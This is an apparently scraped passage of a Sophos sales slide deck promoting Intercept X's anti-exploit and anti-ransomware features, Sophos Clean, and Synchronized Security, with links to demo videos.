![Page 57: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/57.jpg)
Introducing
![Page 58: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/58.jpg)
Introducing Sophos Intercept X
ADVANCED
MALWARE
ZERO DAYEXPLOITS
LIMITEDVISIBILITY
Anti-Exploit
Prevent Exploit Techniques
• Signatureless Exploit Prevention
• Protects Patient-Zero / Zero-Day
• Blocks Memory-Resident Attacks
• Tiny Footprint & Low False Positives
No User/Performance ImpactNo File Scanning
No Signatures
Automated Incident Response
• IT Friendly Incident Response
• Process Threat Chain Visualization
• Prescriptive Remediation Guidance
• Advanced Malware Clean
Root-Cause Analysis
Faster Incident ResponseRoot-Cause VisualizationForensic Strength Clean
Detect Next-Gen Threats
• Stops Malicious Encryption
• Behavior Based Conviction
• Automatically Reverts Affected Files
• Identifies source of Attack
Anti-Ransomware
Prevent Ransomware AttacksRoll-Back Changes
Attack Chain Analysis
![Page 59: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/59.jpg)
Intercepting Exploits
Exploit Prevention
• Monitors processes for attempted use of exploit techniques e.g Buffer overflow, code injection, stack pivot and others
• Blocks when technique is attempted
• Malware is prevented from leveraging vulnerabilities
![Page 60: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/60.jpg)
New EndUser Agent UI New Admin UI
Exploit Protection against Stack Attacks, Return-Oriented Programing (ROP), Heap, Error Handling Overwrites,.DLL Hijacking, and more…
![Page 61: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/61.jpg)
Sophos CleanCompetitive Displacement. Malware Removal. Vulnerability Assessment.
Seed New Accounts• Complimentary to Competitive AV
• View what the others leave behind
• 30-Day Free License
Removes Threats• Deep System Inspection
• Removes Malware Remnants
• Full Quarantine / Removal
• Effective Breach Remediation
On-Demand Assessment• Identifies Risky Files / Processes
• Constantly Refreshed Database
• Provides Additional Confidence
• Command-Line Capable
![Page 62: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/62.jpg)
Synchronized Security
Sophos Central
Cloud Intelligence
Sophos Labs
Analytics | Analyze data across all of Sophos’ products to create simple, actionable insights and automatic resolutions
| 24x7x365, multi-continent operation |URL Database | Malware Identities | File Look-up | Genotypes | Reputation | Behavioural Rules | APT Rules Apps | Anti-Spam | Data Control | SophosID | Patches | Vulnerabilities | Sandboxing | API Everywhere
Admin Self Service Partner| Manage All Sophos Products | User Customizable Alerts | Management of Customer Installations
Endpoint/Next-Gen Endpoint
Mobile
Server
Encryption
UTM/Next-Gen Firewall
Wireless
Web
In Cloud On Prem
62
![Page 63: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/63.jpg)
Sophos Central
Cloud Intelligence
Sophos Labs
Analytics | Analyze data across all of Sophos’ products to create simple, actionable insights and automatic resolutions
| 24x7x365, multi-continent operation |URL Database | Malware Identities | File Look-up | Genotypes | Reputation | Behavioural Rules | APT Rules Apps | Anti-Spam | Data Control | SophosID | Patches | Vulnerabilities | Sandboxing | API Everywhere
Admin Self Service Partner| Manage All Sophos Products | User Customizable Alerts | Management of Customer Installations
Mobile
Server
Encryption
Wireless
Web
In Cloud On Prem
Endpoint/Next-Gen EndpointUTM/Next-Gen Firewall
Synchronized Security
Heartbeat
63
![Page 64: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/64.jpg)
Sophos Central
Cloud Intelligence
Sophos Labs
Analytics | Analyze data across all of Sophos’ products to create simple, actionable insights and automatic resolutions
| 24x7x365, multi-continent operation |URL Database | Malware Identities | File Look-up | Genotypes | Reputation | Behavioural Rules | APT Rules Apps | Anti-Spam | Data Control | SophosID | Patches | Vulnerabilities | Sandboxing | API Everywhere
Admin Self Service Partner| Manage All Sophos Products | User Customizable Alerts | Management of Customer Installations
In Cloud On Prem
Endpoint/Next-Gen EndpointUTM/Next-Gen Firewall
Extending Security Heartbeat™
Mobile
Server
Wireless
Web
Security Heartbeat™
Encryption
![Page 65: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/65.jpg)
Cloud Intelligence
Analytics | Analyze data across all of Sophos’ products to create simple, actionable insights and automatic resolutions
Sophos Labs | 24x7x365, multi-continent operation |URL Database | Malware Identities | File Look-up | Genotypes | Reputation | Behavioural Rules | APT Rules Apps | Anti-Spam | Data Control | SophosID | Patches | Vulnerabilities | Sandboxing | API Everywhere
UTM/Next-Gen Firewall
Admin Self Service Partner| Manage All Sophos Products | User Customizable Alerts | Management of Customer Installations
Wireless
Web
Synchronized Encryption
Endpoint/Next-Gen Endpoint
Mobile
Server
Encryption
Sophos CentralIn Cloud On Prem
Synchronized Encryption
![Page 66: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/66.jpg)
Synchronized Security
Sophos Central
Cloud Intelligence
Sophos Labs
Analytics | Analyze data across all of Sophos’ products to create simple, actionable insights and automatic resolutions
| 24x7x365, multi-continent operation |URL Database | Malware Identities | File Look-up | Genotypes | Reputation | Behavioural Rules | APT Rules Apps | Anti-Spam | Data Control | SophosID | Patches | Vulnerabilities | Sandboxing | API Everywhere
Admin Self Service Partner| Manage All Sophos Products | User Customizable Alerts | Management of Customer Installations
Endpoint/Next-Gen Endpoint
Mobile
Server
Encryption
UTM/Next-Gen Firewall
Wireless
Web
In Cloud On Prem
![Page 67: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/67.jpg)
Intercept X in 3 min……
67
https://player.vimeo.com/video/180040392?width=800&height=450&iframe=true&portrait=0 Sophos Intercept X: Crypto Guard Anti Ransomware in 60 sec
https://player.vimeo.com/video/180040393?width=800&height=450&iframe=true&portrait=0 Sophos Intercept X: Root Cause Analyst (RCA) in 2 minutes
https://player.vimeo.com/video/180172281?width=800&height=450&iframe=true&portrait=0 Sophos Intercept X: Signature Exploit Prevention in 60 seconds
![Page 68: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/68.jpg)
![Page 69: Sophos Become an IT hero...2 main vectors of attack • SPAM (via social engineering) ○ Seemingly plausible sender ○ Has attachment e.g. invoice, parcel delivery note ○ The attachment](https://reader035.fdocuments.net/reader035/viewer/2022071216/6047a436d01d8b5358334f83/html5/thumbnails/69.jpg)